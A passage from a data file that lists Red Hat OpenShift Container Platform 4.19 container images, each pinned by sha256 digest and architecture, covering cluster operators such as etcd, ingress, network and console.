"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
